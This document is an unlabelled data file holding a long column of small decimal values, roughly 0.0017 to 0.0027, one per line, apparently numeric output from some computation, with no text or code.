0.00261989
0.00262001
0.00262473
0.00262468
0.00262468
0.00261998
0.00261989
0.00261472
0.00260998
0.00261473
0.00261477
0.00260993
0.00260002
0.00260485
0.0026048
0.00260014
0.0026048
0.00260011
0.00260003
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.0025902
0.00259012
0.00259493
0.00259489
0.00259011
0.00260002
0.00260485
0.0026048
0.00260014
0.0026048
0.00260011
0.00260003
0.00259487
0.00259488
0.00259015
0.00259492
0.0025901
0.00260001
0.00260484
0.00260004
0.00260479
0.00260006
0.00259489
0.00259495
0.0025902
0.00259012
0.00259494
0.00259489
0.00259011
0.00261986
0.0026147
0.00261987
0.0026147
0.00260003
0.00260476
0.00260476
0.00260482
0.00259997
0.00259997
0.00259491
0.00259033
0.0025949
0.00259012
0.00259494
0.00259485
0.00259024
0.00259491
0.00259033
0.0025949
0.00259012
0.00259494
0.00259485
0.00259024
0.00260015
0.00260477
0.00260486
0.00260007
0.00260482
0.00260024
0.00260003
0.00260015
0.00260477
0.00260486
0.00260007
0.00260482
0.00260024
0.00260003
0.00259491
0.00259006
0.00259006
0.00259484
0.00259484
0.00259012
0.00259486
0.0026
0.00259486
0.0026
0.0026225
0.0026225
0.00261256
0.00261256
0.00261256
0.00261255
0.0026225
0.00262031
0.0026245
0.0026245
0.0026207
0.00262459
0.00262042
0.00262042
0.00263455
0.00263433
0.00263038
0.00263038
0.00263446
0.00263446
0.00263027
0.00263456
0.00263433
0.00263038
0.00263038
0.00263446
0.00263446
0.00263027
0.00263456
0.00263433
0.00263038
0.00263038
0.00263446
0.00263446
0.00263027
0.00263456
0.00263433
0.00263038
0.00263038
0.00263027
0.00263446
0.00263446
0.00262031
0.0026245
0.0026245
0.0026207
0.00262459
0.00262042
0.00262042
0.00259477
0.00259458
0.00259066
0.00259068
0.0025947
0.00259471
0.00259048
0.00262031
0.0026245
0.0026245
0.0026207
0.00262042
0.00262459
0.00262042
0.00259479
0.00259457
0.00259065
0.00259064
0.0025947
0.0025947
0.00259053
0.00262031
0.0026245
0.0026245
0.0026207
0.00262042
0.00262459
0.00262042
0.00259479
0.00259457
0.00259064
0.00259064
0.0025947
0.0025947
0.00259053
0.00259479
0.00259457
0.00259064
0.00259064
0.0025947
0.0025947
0.00259053
0.00264244
0.00263246
0.00263246
0.00264244
0.00264244
0.00264243
0.00263246
0.00264244
0.00263246
0.00263246
0.00264244
0.00264244
0.00264243
0.00263246
0.00264244
0.00263246
0.00263246
0.00264244
0.00264244
0.00264243
0.00263246
0.00264244
0.00263246
0.00263246
0.00264244
0.00264244
0.00264244
0.00263246
0.00265454
0.00265013
0.0026546
0.00265016
0.00265455
0.00265462
0.00265032
0.0026225
0.0026225
0.00261256
0.00261256
0.00261256
0.00261255
0.0026225
0.0026225
0.0026225
0.00261256
0.00261256
0.00261256
0.00261255
0.0026225
0.0026225
0.0026225
0.00261256
0.00261256
0.00261256
0.00261255
0.0026225
0.00260263
0.00259271
0.00259271
0.00260263
0.00260263
0.00260263
0.00259271
0.00260263
0.00259271
0.00259271
0.00260263
0.00260263
0.00260263
0.00259271
0.00260263
0.00259271
0.00259271
0.00260263
0.00260263
0.00260263
0.00259271
0.00260263
0.00259271
0.00259271
0.00260263
0.00260263
0.00260263
0.00259271
0.00261464
0.00261478
0.00261033
0.0026105
0.00261476
0.00261465
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026246
0.00262024
0.0026202
0.00262043
0.0026203
0.00262471
0.0026246
0.00262459
0.00262027
0.00262044
0.00261466
0.00261026
0.00261471
0.00261029
0.00261466
0.00261473
0.00261047
0.00261464
0.00261478
0.0026105
0.00261033
0.00261465
0.00261476
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026246
0.00262024
0.0026202
0.00262043
0.00262031
0.0026246
0.00262471
0.00262459
0.00262044
0.00262027
0.00261466
0.00261026
0.00261472
0.0026103
0.00261466
0.00261473
0.00261047
0.00261464
0.00261442
0.00261048
0.00261048
0.00261455
0.00261455
0.00261037
0.00264024
0.00264063
0.00264444
0.00264444
0.00264453
0.00264035
0.00264036
0.00264035
0.00264466
0.00264454
0.00264024
0.00264453
0.00264021
0.00264037
0.00263457
0.00263019
0.00263463
0.00263016
0.00263457
0.00263464
0.00263037
0.00264034
0.00264462
0.00264455
0.00264003
0.00264016
0.00264454
0.00264014
0.00263455
0.0026347
0.00263023
0.0026304
0.00263467
0.00263456
0.00263038
0.00264035
0.00264466
0.00264454
0.00264023
0.00264453
0.00264021
0.00264037
0.00263457
0.0026302
0.00263463
0.00263016
0.00263464
0.00263457
0.00263037
0.00264034
0.00264462
0.00264455
0.00264003
0.00264455
0.00264014
0.00264017
0.00263455
0.0026347
0.00263023
0.0026304
0.00263467
0.00263456
0.00263038
0.00264024
0.00264063
0.00264444
0.00264444
0.00264036
0.00264453
0.00264035
0.00265453
0.00265468
0.0026502
0.00265036
0.00265465
0.00265454
0.00265034
0.00265454
0.00265013
0.00265462
0.00265033
0.00265453
0.00265468
0.00265036
0.0026502
0.00265453
0.00265466
0.00265033
0.00265454
0.00265013
0.0026546
0.00265016
0.00265462
0.00265033
0.00265455
0.00264035
0.00264466
0.00264454
0.00264024
0.00264453
0.00264021
0.00264037
0.00263457
0.0026302
0.00263463
0.00263016
0.00263457
0.00263464
0.00263037
0.00264034
0.00264462
0.00264455
0.00264003
0.00264017
0.00264455
0.00264014
0.00263455
0.00263469
0.00263023
0.0026304
0.00263467
0.00263456
0.00263038
0.00264035
0.00264454
0.00264466
0.00264023
0.00264453
0.00264037
0.00264021
0.00263457
0.0026302
0.00263463
0.00263016
0.00263465
0.00263457
0.00263037
0.00264034
0.00264463
0.00264455
0.00264003
0.00264454
0.00264014
0.00264017
0.00263455
0.0026347
0.0026304
0.00263023
0.00263456
0.00263467
0.00263038
0.00264035
0.00264465
0.00264454
0.00264024
0.00264453
0.00264021
0.00264037
0.00263457
0.00263019
0.00263463
0.00263016
0.00263037
0.00263457
0.00263464
0.00264034
0.00264462
0.00264455
0.00264003
0.00264454
0.00264017
0.00264014
0.00263455
0.00263469
0.00263023
0.0026304
0.00263038
0.00263467
0.00263456
0.00264035
0.00264454
0.00264466
0.00264023
0.00264453
0.00264037
0.00264021
0.00263457
0.00263019
0.00263463
0.00263016
0.00263464
0.00263457
0.00263037
0.00264034
0.00264462
0.00264455
0.00264003
0.00264455
0.00264014
0.00264017
0.00263455
0.00263469
0.0026304
0.00263023
0.00263456
0.00263467
0.00263038
0.00265453
0.00265431
0.00265034
0.00265034
0.00265444
0.00265444
0.00265022
0.00264024
0.00264063
0.00264444
0.00264444
0.00264035
0.00264454
0.00264035
0.00264035
0.00264454
0.00264465
0.00264024
0.00264453
0.00264037
0.00264021
0.00263457
0.0026302
0.00263463
0.00263016
0.00263037
0.00263457
0.00263464
0.00264034
0.00264462
0.00264455
0.00264003
0.00264455
0.00264017
0.00264014
0.00263455
0.0026347
0.0026304
0.00263023
0.00263038
0.00263456
0.00263467
0.00264035
0.00264454
0.00264466
0.00264024
0.00264453
0.00264037
0.00264021
0.00263457
0.00263019
0.00263463
0.00263016
0.00263464
0.00263457
0.00263037
0.00264034
0.00264462
0.00264455
0.00264003
0.00264455
0.00264014
0.00264017
0.00263455
0.0026347
0.0026304
0.00263023
0.00263456
0.00263467
0.00263038
0.00264024
0.00264063
0.00264444
0.00264444
0.00264453
0.00264035
0.00264035
0.00261464
0.00261442
0.00261048
0.00261048
0.00261037
0.00261455
0.00261455
0.00260044
0.00260084
0.00260462
0.00260462
0.00260471
0.00260055
0.00260056
0.00261464
0.00261478
0.00261033
0.0026105
0.00261476
0.00261465
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026202
0.0026246
0.00262023
0.00262043
0.0026203
0.00262471
0.0026246
0.00262027
0.00262459
0.00262044
0.00261466
0.00261026
0.00261471
0.0026103
0.00261473
0.00261466
0.00261047
0.00261464
0.00261478
0.00261033
0.0026105
0.00261476
0.00261465
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026246
0.0026202
0.00262024
0.00262043
0.0026203
0.00262471
0.0026246
0.00262459
0.00262027
0.00262044
0.00261466
0.00261026
0.00261472
0.0026103
0.00261473
0.00261047
0.00261466
0.00260057
0.00260482
0.00260472
0.00260044
0.00260471
0.0026004
0.00260058
0.0025948
0.00259043
0.00259486
0.00259042
0.0025948
0.00259488
0.00259063
0.00260055
0.0026048
0.00260473
0.00260022
0.00260036
0.00260472
0.00260033
0.00259479
0.00259493
0.00259049
0.00259067
0.0025949
0.0025948
0.00259066
0.00260057
0.00260482
0.00260472
0.00260043
0.00260471
0.0026004
0.00260058
0.00259481
0.00259046
0.00259487
0.00259042
0.00259488
0.00259481
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260033
0.00260037
0.00259479
0.00259493
0.00259048
0.00259067
0.0025949
0.0025948
0.00259066
0.00261464
0.00261442
0.00261048
0.00261048
0.00261455
0.00261455
0.00261037
0.00260044
0.00260084
0.00260462
0.00260462
0.00260056
0.00260471
0.00260055
0.00261464
0.00261478
0.00261033
0.0026105
0.00261476
0.00261465
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026202
0.00262461
0.00262024
0.00262043
0.0026203
0.00262471
0.0026246
0.00262027
0.00262459
0.00262044
0.00261466
0.00261026
0.00261471
0.0026103
0.00261473
0.00261466
0.00261048
0.00261464
0.00261478
0.0026105
0.00261033
0.00261465
0.00261476
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.0026246
0.0026202
0.00262024
0.00262043
0.0026203
0.0026246
0.00262471
0.00262459
0.00262044
0.00262027
0.00261466
0.00261026
0.00261472
0.0026103
0.00261473
0.00261047
0.00261466
0.00260057
0.00260483
0.00260472
0.00260044
0.00260471
0.0026004
0.00260057
0.00259481
0.00259047
0.00259487
0.00259042
0.00259482
0.00259488
0.00259064
0.00260055
0.0026048
0.00260473
0.00260024
0.00260037
0.00260472
0.00260033
0.00259479
0.00259493
0.00259049
0.00259066
0.00259491
0.0025948
0.00259066
0.00260057
0.00260472
0.00260482
0.00260044
0.00260471
0.00260057
0.0026004
0.00259481
0.00259046
0.00259487
0.00259042
0.00259488
0.00259481
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260033
0.00260037
0.00259479
0.00259493
0.00259066
0.00259049
0.0025948
0.00259491
0.00259066
0.00261464
0.00261478
0.0026105
0.00261033
0.00261465
0.00261476
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.00262024
0.0026246
0.0026202
0.00262043
0.0026203
0.0026246
0.00262471
0.00262044
0.00262459
0.00262027
0.00261466
0.00261026
0.00261472
0.00261029
0.00261466
0.00261473
0.00261047
0.00260057
0.00260482
0.00260472
0.00260044
0.00260471
0.0026004
0.00260058
0.00259481
0.00259045
0.00259487
0.00259042
0.00259481
0.00259488
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260037
0.00260033
0.00259479
0.00259493
0.00259048
0.00259066
0.0025949
0.0025948
0.00259066
0.00260057
0.00260472
0.00260482
0.00260043
0.00260471
0.00260058
0.0026004
0.00259481
0.00259045
0.00259487
0.00259042
0.00259488
0.00259481
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260033
0.00260037
0.00259479
0.00259493
0.00259067
0.00259048
0.0025948
0.0025949
0.00259066
0.00261464
0.00261442
0.00261048
0.00261048
0.00261455
0.00261455
0.00261037
0.00260044
0.00260084
0.00260462
0.00260462
0.00260056
0.00260471
0.00260055
0.00261464
0.00261478
0.0026105
0.00261033
0.00261465
0.00261476
0.00261049
0.00262041
0.00262461
0.00262468
0.0026201
0.00262024
0.0026246
0.0026202
0.00262043
0.00262031
0.0026246
0.00262471
0.00262044
0.00262459
0.00262027
0.00261466
0.00261026
0.00261472
0.00261029
0.00261466
0.00261473
0.00261047
0.00260057
0.00260472
0.00260482
0.00260044
0.00260471
0.00260057
0.0026004
0.00259481
0.00259046
0.00259487
0.00259042
0.00259481
0.00259488
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260037
0.00260033
0.00259479
0.00259493
0.00259066
0.00259049
0.0025948
0.0025949
0.00259066
0.00260057
0.00260472
0.00260482
0.00260044
0.00260471
0.00260057
0.0026004
0.00259481
0.00259045
0.00259487
0.00259042
0.00259488
0.00259481
0.00259064
0.00260055
0.0026048
0.00260473
0.00260023
0.00260472
0.00260033
0.00260037
0.00259479
0.00259493
0.00259066
0.00259049
0.0025948
0.00259491
0.00259066
0.00260044
0.00260084
0.00260462
0.00260462
0.00260471
0.00260055
0.00260055
0.00258282
0.00258281
0.00258281
0.00258467
0.00254337
0.00254336
0.00254336
0.00254521
0.00250414
0.00250414
0.00250414
0.00250597
0.00246514
0.00246513
0.00246513
0.00246695
0.00242634
0.00242632
0.00242632
0.00242813
0.00238773
0.00238772
0.00238772
0.0023895
0.00234932
0.0023493
0.0023493
0.00235107
0.00231109
0.00231107
0.00231107
0.00231282
0.00227303
0.00227301
0.002273
0.00227474
0.00223512
0.0022351
0.0022351
0.00223682
0.00219736
0.00219734
0.00219734
0.00219904
0.00215972
0.00215969
0.00215969
0.00216139
0.00212217
0.00212215
0.00212215
0.00212383
0.00208472
0.00208469
0.00208469
0.00208636
0.00204733
0.0020473
0.0020473
0.00204896
0.00201002
0.00200998
0.00200999
0.00201164
0.0019728
0.00197276
0.00197276
0.00197441
0.0019357
0.00193566
0.00193566
0.00193731
0.00189879
0.00189875
0.00189874
0.00190038
0.00186212
0.00186207
0.00186207
0.00186369
0.00182573
0.00182569
0.00182568
0.00182729
0.00178965
0.00178961
0.0017896
0.00179119
0.00175384
0.0017538
0.0017538
0.00175537
0.00171825
0.00171821
0.00171822
0.00171979
0.00168284
0.0016828
0.00168281
0.00168438
0.00258467
0.00255144
0.00258281
0.00258281
0.00255321
0.00255321
0.00258467
0.00255144
0.00258281
0.00258281
0.00255321
0.0025532
0.00258281
0.00255321
0.00255321
0.00258467
0.00255144
0.00258281
0.00255321
0.00255321
0.00255144
0.00254521
0.00251218
0.00254336
0.00254336
0.00251392
0.00251392
0.00254521
0.00251218
0.00254336
0.00254336
0.00251392
0.00251392
0.00254336
0.00251393
0.00251393
0.00254521
0.00251218
0.00254336
0.00251392
0.00251393
0.00251218
0.00250597
0.00247313
0.00250414
0.00250414
0.00247486
0.00247486
0.00250597
0.00247313
0.00250414
0.00250414
0.00247486
0.00247486
0.00250414
0.00247486
0.00247486
0.00250597
0.00247313
0.00250414
0.00247486
0.00247486
0.00247313
0.00246695
0.00243429
0.00246513
0.00246513
0.00243601
0.00243601
0.00246695
0.00243429
0.00246513
0.00246513
0.00243601
0.00243601
0.00246513
0.00243601
0.00243601
0.00246695
0.00243429
0.00246513
0.00243601
0.00243601
0.00243429
0.00242813
0.00239564
0.00242632
0.00242632
0.00239735
0.00239735
0.00242813
0.00239564
0.00242632
0.00242632
0.00239735
0.00239735
0.00242632
0.00239735
0.00239735
0.00242813
0.00239564
0.00242632
0.00239735
0.00239735
0.00239564
0.0023895
0.00235719
0.00238772
0.00238772
0.00235889
0.00235889
0.0023895
0.00235719
0.00238772
0.00238772
0.00235889
0.00235889
0.00238772
0.00235889
0.00235889
0.0023895
0.00235718
0.00238772
0.00235889
0.00235889
0.00235718
0.00235107
0.00231891
0.0023493
0.0023493
0.00232061
0.00232061
0.00235107
0.00231891
0.0023493
0.0023493
0.00232061
0.00232061
0.0023493
0.00232061
0.00232061
0.00235107
0.00231891
0.0023493
0.00232061
0.00232061
0.00231891
0.00231282
0.00228081
0.00231107
0.00231107
0.00228251
0.00228251
0.00231282
0.00228081
0.00231107
0.00231107
0.00228251
0.00228251
0.00231107
0.00228251
0.00228251
0.00231282
0.00228081
0.00231107
0.0022825
0.00228251
0.00228081
0.00227474
0.00224287
0.002273
0.00227301
0.00224456
0.00224456
0.00227474
0.00224287
0.00227301
0.002273
0.00224456
0.00224456
0.002273
0.00224456
0.00224456
0.00227474
0.00224287
0.002273
0.00224456
0.00224456
0.00224287
0.00223682
0.00220507
0.0022351
0.0022351
0.00220676
0.00220676
0.00223682
0.00220507
0.0022351
0.0022351
0.00220676
0.00220676
0.0022351
0.00220676
0.00220676
0.00223682
0.00220507
0.0022351
0.00220676
0.00220676
0.00220507
0.00219904
0.0021674
0.00219734
0.00219733
0.00216909
0.00216909
0.00219904
0.0021674
0.00219734
0.00219734
0.00216909
0.00216909
0.00219733
0.00216909
0.00216909
0.00219904
0.0021674
0.00219734
0.00216909
0.00216909
0.0021674
0.00216139
0.00212983
0.00215969
0.00215969
0.00213153
0.00213153
0.00216139
0.00212983
0.00215969
0.00215969
0.00213153
0.00213153
0.00215969
0.00213153
0.00213153
0.00216138
0.00212983
0.00215969
0.00213153
0.00213153
0.00212983
0.00212383
0.00209235
0.00212215
0.00212215
0.00209405
0.00209405
0.00212383
0.00209235
0.00212215
0.00212215
0.00209405
0.00209405
0.00212215
0.00209405
0.00209405
0.00212383
0.00209235
0.00212215
0.00209405
0.00209405
0.00209235
0.00208636
0.00205495
0.00208469
0.00208469
0.00205664
0.00205664
0.00208636
0.00205495
0.00208469
0.00208469
0.00205664
0.00205664
0.00208469
0.00205664
0.00205664
0.00208636
0.00205495
0.00208469
0.00205664
0.00205664
0.00205495
0.00204896
0.00201761
0.0020473
0.0020473
0.00201931
0.00201931
0.00204896
0.00201761
0.0020473
0.0020473
0.00201931
0.00201931
0.0020473
0.00201931
0.0020193
0.00204896
0.00201761
0.0020473
0.00201931
0.00201931
0.00201761
0.00201164
0.00198037
0.00200999
0.00200998
0.00198206
0.00198206
0.00201164
0.00198037
0.00200999
0.00200998
0.00198206
0.00198206
0.00200998
0.00198206
0.00198206
0.00201164
0.00198037
0.00200998
0.00198206
0.00198206
0.00198037
0.00197441
0.00194324
0.00197276
0.00197276
0.00194492
0.00194492
0.00197441
0.00194324
0.00197276
0.00197276
0.00194492
0.00194492
0.00197276
0.00194492
0.00194492
0.00197441
0.00194324
0.00197276
0.00194492
0.00194492
0.00194324
0.0019373
0.00190628
0.00193566
0.00193566
0.00190795
0.00190795
0.0019373
0.00190628
0.00193566
0.00193566
0.00190795
0.00190795
0.00193566
0.00190795
0.00190796
0.0019373
0.00190628
0.00193566
0.00190795
0.00190796
0.00190628
0.00190037
0.00186954
0.00189874
0.00189874
0.00187121
0.00187121
0.00190037
0.00186955
0.00189874
0.00189874
0.00187121
0.00187121
0.00189875
0.00187122
0.00187122
0.00190037
0.00186954
0.00189875
0.00187121
0.00187122
0.00186955
0.00186368
0.0018331
0.00186206
0.00186207
0.00183475
0.00183475
0.00186369
0.0018331
0.00186207
0.00186206
0.00183475
0.00183475
0.00186207
0.00183476
0.00183476
0.00186368
0.0018331
0.00186207
0.00183475
0.00183475
0.00183311
0.00182729
0.00179696
0.00182569
0.00182569
0.0017986
0.0017986
0.00182729
0.00179696
0.00182568
0.00182568
0.0017986
0.0017986
0.00182569
0.0017986
0.0017986
0.00182728
0.00179696
0.00182569
0.0017986
0.0017986
0.00179696
0.00179119
0.0017611
0.00178961
0.00178961
0.00176272
0.00176272
0.00179119
0.0017611
0.0017896
0.0017896
0.00176273
0.00176273
0.0017896
0.00176272
0.00176272
0.00179119
0.0017611
0.0017896
0.00176272
0.00176272
0.0017611
0.00175538
0.00172548
0.0017538
0.00175379
0.00172709
0.00172709
0.00175537
0.00172548
0.0017538
0.0017538
0.00172709
0.0017271
0.00175379
0.00172709
0.00172709
0.00175538
0.00172548
0.00175379
0.00172709
0.00172709
0.00172548
0.00171979
0.00169005
0.00171821
0.00171821
0.00169164
0.00169164
0.00171978
0.00169004
0.00171822
0.00171822
0.00169165
0.00169165
0.00171821
0.00169164
0.00169164
0.00171979
0.00169005
0.00171821
0.00169165
0.00169164
0.00169004
0.00168438
0.00168281
0.00168281
0.00168438
0.00168281
0.00168281
0.0016828
0.00168438
0.0016828
0.00257045
0.00258498
0.00257035
0.00258505
0.00258496
0.00257032
0.00257045
0.00258498
0.00257035
0.00258505
0.00258282
0.00258282
0.00258282
0.00255321
0.00255321
0.00255321
0.00255321
0.00257075
0.00258496
0.00258282
0.00257293
0.00257054
0.00257293
0.00258502
0.00258496
0.00257032
0.00257075
0.00258281
0.00258497
0.00257293
0.00257293
0.00257054
0.00258502
0.002585
0.002585
0.00257116
0.00257039
0.00257039
0.00253107
0.00254552
0.00254558
0.00253097
0.0025455
0.00253094
0.00253107
0.00254552
0.00254558
0.00253097
0.00254337
0.00254337
0.00254337
0.00251393
0.00251393
0.00251393
0.00251393
0.00253135
0.0025455
0.00254336
0.00253354
0.00254555
0.00253115
0.00253354
0.0025455
0.00253094
0.00253135
0.00254336
0.0025455
0.00253354
0.00254555
0.00253354
0.00253115
0.00254554
0.00254554
0.00253178
0.002531
0.002531
0.0024919
0.00250628
0.00250634
0.00249181
0.00250627
0.00249179
0.0024919
0.00250628
0.00250634
0.00249181
0.00250414
0.00250414
0.00250414
0.00247487
0.00247487
0.00247487
0.00247487
0.00249217
0.00250626
0.00250414
0.00249437
0.0025063
0.00249198
0.00249437
0.00250627
0.00249179
0.00249216
0.00250414
0.00250626
0.00249437
0.0025063
0.00249437
0.00249198
0.0025063
0.0025063
0.00249263
0.00249184
0.00249184
0.00245295
0.00246726
0.00246732
0.00245287
0.00246725
0.00245284
0.00245295
0.00246726
0.00246731
0.00245287
0.00246514
0.00246514
0.00246514
0.00243602
0.00243602
0.00243602
0.00243602
0.0024532
0.00246723
0.00246513
0.00245541
0.00246727
0.00245302
0.00245541
0.00246725
0.00245284
0.0024532
0.00246513
0.00246724
0.00245541
0.00246727
0.00245541
0.00245302
0.00246728
0.00246728
0.00245368
0.00245289
0.00245289
0.0024142
0.00242845
0.00242849
0.00241412
0.00242843
0.0024141
0.0024142
0.00242845
0.00242849
0.00241412
0.00242634
0.00242633
0.00242633
0.00239736
0.00239736
0.00239736
0.00239736
0.00241444
0.00242842
0.00242632
0.00241665
0.00242844
0.00241427
0.00241666
0.00242843
0.0024141
0.00241444
0.00242632
0.00242842
0.00241665
0.00242844
0.00241666
0.00241427
0.00242846
0.00242846
0.00241494
0.00241414
0.00241414
0.00237565
0.00238983
0.00238987
0.00237557
0.00238982
0.00237555
0.00237565
0.00238983
0.00238987
0.00237558
0.00238773
0.00238773
0.00238773
0.0023589
0.0023589
0.0023589
0.0023589
0.00237588
0.0023898
0.00238772
0.0023781
0.00238982
0.00237571
0.0023781
0.00238982
0.00237555
0.00237588
0.00238772
0.0023898
0.0023781
0.00238982
0.0023781
0.00237571
0.00238984
0.00238984
0.00237639
0.00237559
0.00237559
0.00233728
0.0023514
0.00235145
0.00233721
0.00235139
0.00233719
0.00233728
0.0023514
0.00235145
0.00233722
0.00234932
0.00234932
0.00234932
0.00232063
0.00232063
0.00232063
0.00232063
0.0023375
0.00235137
0.00234931
0.00233973
0.00235139
0.00233734
0.00233973
0.00235139
0.00233719
0.0023375
0.0023493
0.00235137
0.00233973
0.00235139
0.00233973
0.00233734
0.00235142
0.00235142
0.00233802
0.00233723
0.00233723
0.0022991
0.00231316
0.0023132
0.00229903
0.00231315
0.00229901
0.0022991
0.00231316
0.0023132
0.00229903
0.00231109
0.00231109
0.00231109
0.00228253
0.00228253
0.00228253
0.00228253
0.00229931
0.00231313
0.00231107
0.00230154
0.00231314
0.00229916
0.00230154
0.00231315
0.00229901
0.00229931
0.00231107
0.00231313
0.00230154
0.00231314
0.00230154
0.00229916
0.00231317
0.00231317
0.00229984
0.00229905
0.00229905
0.00226108
0.00227509
0.00227513
0.00226102
0.00227508
0.002261
0.00226108
0.00227509
0.00227513
0.00226102
0.00227303
0.00227303
0.00227302
0.00224458
0.00224458
0.00224458
0.00224458
0.00226129
0.00227505
0.00227301
0.00226351
0.00227506
0.00226114
0.00226352
0.00227508
0.002261
0.00226128
0.00227301
0.00227506
0.00226351
0.00227506
0.00226352
0.00226114
0.0022751
0.0022751
0.00226182
0.00226103
0.00226103
0.00222322
0.00223718
0.00223721
0.00222316
0.00223717
0.00222314
0.00222322
0.00223718
0.00223721
0.00222316
0.00223512
0.00223512
0.00223512
0.00220679
0.00220679
0.00220679
0.00220679
0.00222342
0.00223714
0.00223511
0.00222565
0.00223715
0.00222327
0.00222565
0.00223717
0.00222314
0.00222342
0.00223511
0.00223714
0.00222565
0.00223715
0.00222565
0.00222327
0.00223719
0.00223719
0.00222395
0.00222317
0.00222317
0.00218549
0.00219941
0.00219944
0.00218544
0.0021994
0.00218542
0.00218549
0.00219941
0.00219944
0.00218544
0.00219736
0.00219736
0.00219736
0.00216912
0.00216912
0.00216912
0.00216912
0.00218569
0.00219937
0.00219735
0.00218791
0.00219937
0.00218555
0.00218792
0.0021994
0.00218542
0.00218568
0.00219735
0.00219937
0.00218791
0.00219937
0.00218792
0.00218555
0.00219942
0.00219942
0.00218622
0.00218545
0.00218545
0.00214788
0.00216176
0.00216179
0.00214783
0.00216175
0.00214781
0.00214788
0.00216176
0.00216179
0.00214783
0.00215972
0.00215972
0.00215972
0.00213155
0.00213155
0.00213155
0.00213155
0.00214807
0.00216173
0.0021597
0.0021503
0.00216173
0.00214794
0.00215031
0.00216176
0.00214781
0.00214807
0.0021597
0.00216173
0.0021503
0.00216173
0.00215031
0.00214794
0.00216177
0.00216177
0.0021486
0.00214784
0.00214784
0.00211037
0.00212421
0.00212425
0.00211031
0.00212421
0.0021103
0.00211037
0.00212422
0.00212425
0.00211031
0.00212217
0.00212217
0.00212217
0.00209407
0.00209407
0.00209407
0.00209407
0.00211055
0.00212418
0.00212216
0.00211278
0.00212418
0.00211042
0.00211279
0.00212421
0.0021103
0.00211055
0.00212216
0.00212418
0.00211278
0.00212418
0.00211279
0.00211042
0.00212423
0.00212423
0.00211108
0.00211033
0.00211033
0.00207293
0.00208675
0.00208678
0.00207288
0.00208675
0.00207286
0.00207293
0.00208675
0.00208678
0.00207288
0.00208472
0.00208472
0.00208472
0.00205667
0.00205667
0.00205667
0.00205667
0.00207311
0.00208672
0.00208471
0.00207533
0.00208672
0.00207298
0.00207535
0.00208675
0.00207286
0.00207311
0.00208471
0.00208673
0.00207533
0.00208672
0.00207535
0.00207298
0.00208677
0.00208677
0.00207364
0.00207289
0.00207289
0.00203557
0.00204937
0.0020494
0.00203552
0.00204936
0.0020355
0.00203557
0.00204937
0.0020494
0.00203552
0.00204733
0.00204733
0.00204733
0.00201934
0.00201934
0.00201934
0.00201934
0.00203574
0.00204934
0.00204732
0.00203796
0.00204933
0.00203562
0.00203798
0.00204936
0.0020355
0.00203574
0.00204732
0.00204934
0.00203796
0.00204933
0.00203798
0.00203562
0.00204938
0.00204938
0.00203627
0.00203553
0.00203553
0.00199828
0.00201206
0.00201208
0.00199824
0.00201205
0.00199822
0.00199828
0.00201206
0.00201208
0.00199824
0.00201002
0.00201002
0.00201002
0.00198209
0.00198209
0.00198209
0.00198209
0.00199845
0.00201202
0.00201001
0.00200067
0.00201201
0.00199833
0.00200069
0.00201205
0.00199822
0.00199845
0.00201001
0.00201202
0.00200067
0.00201201
0.00200069
0.00199833
0.00201207
0.00201207
0.00199897
0.00199825
0.00199825
0.0019611
0.00197484
0.00197486
0.00196106
0.00197483
0.00196104
0.0019611
0.00197484
0.00197486
0.00196106
0.0019728
0.0019728
0.0019728
0.00194496
0.00194496
0.00194496
0.00194496
0.00196126
0.0019748
0.00197278
0.00196347
0.00197479
0.00196115
0.00196349
0.00197483
0.00196104
0.00196126
0.00197278
0.0019748
0.00196347
0.00197479
0.0019635
0.00196115
0.00197485
0.00197485
0.00196178
0.00196107
0.00196107
0.00192406
0.00193774
0.00193776
0.00192401
0.00193774
0.00192401
0.00192406
0.00193774
0.00193776
0.00192402
0.0019357
0.0019357
0.0019357
0.001908
0.001908
0.001908
0.001908
0.00192422
0.00193771
0.00193569
0.00192641
0.00193769
0.00192411
0.00192644
0.00193774
0.001924
0.00192422
0.00193569
0.00193771
0.00192641
0.00193769
0.00192644
0.00192411
0.00193776
0.00193776
0.00192473
0.00192403
0.00192403
0.00188721
0.00190082
0.00190083
0.00188717
0.00190082
0.00188716
0.00188721
0.00190082
0.00190083
0.00188717
0.00189879
0.00189879
0.00189879
0.00187126
0.00187126
0.00187126
0.00187126
0.00188736
0.00190078
0.00189877
0.00188955
0.00190076
0.00188726
0.00188958
0.00190082
0.00188716
0.00188736
0.00189877
0.00190078
0.00188955
0.00190076
0.00188958
0.00188726
0.00190083
0.00190084
0.00188788
0.00188719
0.00188719
0.00185062
0.00186414
0.00186415
0.00185059
0.00186415
0.00185058
0.00185062
0.00186413
0.00186415
0.00185059
0.00186212
0.00186212
0.00186212
0.0018348
0.0018348
0.0018348
0.00183481
0.00185078
0.0018641
0.0018621
0.00185295
0.00186408
0.00185068
0.00185298
0.00186414
0.00185058
0.00185077
0.0018621
0.0018641
0.00185294
0.00186407
0.00185297
0.00185068
0.00186415
0.00186415
0.00185129
0.00185061
0.00185061
0.00181435
0.00182775
0.00182776
0.00181433
0.00182775
0.00181432
0.00181435
0.00182775
0.00182776
0.00181433
0.00182574
0.00182573
0.00182574
0.00179865
0.00179865
0.00179864
0.00179865
0.00181449
0.00182771
0.00182572
0.00181664
0.00182768
0.0018144
0.00181667
0.00182775
0.00181431
0.00181449
0.00182571
0.00182771
0.00181664
0.00182768
0.00181666
0.0018144
0.00182776
0.00182776
0.00181499
0.00181433
0.00181433
0.00177837
0.00179167
0.00179167
0.00177835
0.00179167
0.00177834
0.00177837
0.00179167
0.00179167
0.00177835
0.00178965
0.00178965
0.00178965
0.00176277
0.00176277
0.00176277
0.00176277
0.00177851
0.00179162
0.00178963
0.00178063
